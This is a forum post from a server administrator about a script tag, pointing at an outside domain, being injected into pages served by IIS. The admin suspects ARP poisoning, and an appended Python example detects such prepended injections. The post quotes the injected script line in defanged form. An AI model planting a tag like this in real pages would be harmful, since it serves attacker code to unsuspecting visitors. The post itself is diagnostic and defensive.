One of our Windows servers was misbehaving and code is being injected into pages:
<##script src=http://hounian.tj.cn/count/js/gif.gif><##/script##>
(the ## are added to avoid any kind of execution from here)
The above code is inserted at the beginning of the page and is followed by 28 0x00 bytes before the original page starts.
The actual HTML page does NOT contain the code, so it is somehow injected in IIS...
Anyone know how to solve this as I am only getting Chinese pages with similar info...
The server is running Win2K3, which is fully patched, but it runs an older PHP version, which may be the way they got in (not sure about this).
The mirror itself has been removed from the mirrorlist so as not to cause problems for unprotected users.
Update:
I found this link:
http://www.ntsecurity.net/article/ar...-underway.html
So our server might not be infected but the ARP cache from the ISP hosting the server might be... I've submitted a ticket
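
An added example, not part of the original post: a Python check that compares the bytes a client received with the file on disk and reports a prepended block of the kind described above (a script tag followed by 0x00 padding). The function name, the sample page and the `injected.example` URL are constructed for illustration.

```python
import re

# Matches the src attribute of any <script> tag in the injected prefix.
SCRIPT_SRC = re.compile(rb"<script[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)


def find_injected_prefix(served: bytes, on_disk: bytes):
    """Return details of bytes prepended to `on_disk` in `served`, or None.

    Covers only the pattern from the post: the original page arrives intact
    but with extra bytes in front of it.
    """
    if served == on_disk:
        return None
    if not on_disk or not served.endswith(on_disk):
        # Content differs in some other way (dynamic page, mid-body edit).
        return {"kind": "mismatch", "prefix_len": None, "script_srcs": [], "nul_padding": 0}
    prefix = served[: len(served) - len(on_disk)]
    stripped = prefix.rstrip(b"\x00")
    return {
        "kind": "prepended",
        "prefix_len": len(prefix),
        "script_srcs": [m.decode("latin-1") for m in SCRIPT_SRC.findall(stripped)],
        "nul_padding": len(prefix) - len(stripped),
    }


# Constructed sample data (not captured from the affected server).
ORIGINAL_PAGE = b"<html><head><title>Mirror</title></head><body>index</body></html>\n"
SAMPLE_INJECTION = b"<script src=http://injected.example/a.js></script>" + b"\x00" * 28
SERVED_PAGE = SAMPLE_INJECTION + ORIGINAL_PAGE

if __name__ == "__main__":
    print(find_injected_prefix(SERVED_PAGE, ORIGINAL_PAGE))
    print(find_injected_prefix(ORIGINAL_PAGE, ORIGINAL_PAGE))
```

Running the same comparison on a response fetched over loopback on the server and on one fetched from an outside host helps separate injection inside IIS from modification on the network path, since a loopback request never crosses the LAN.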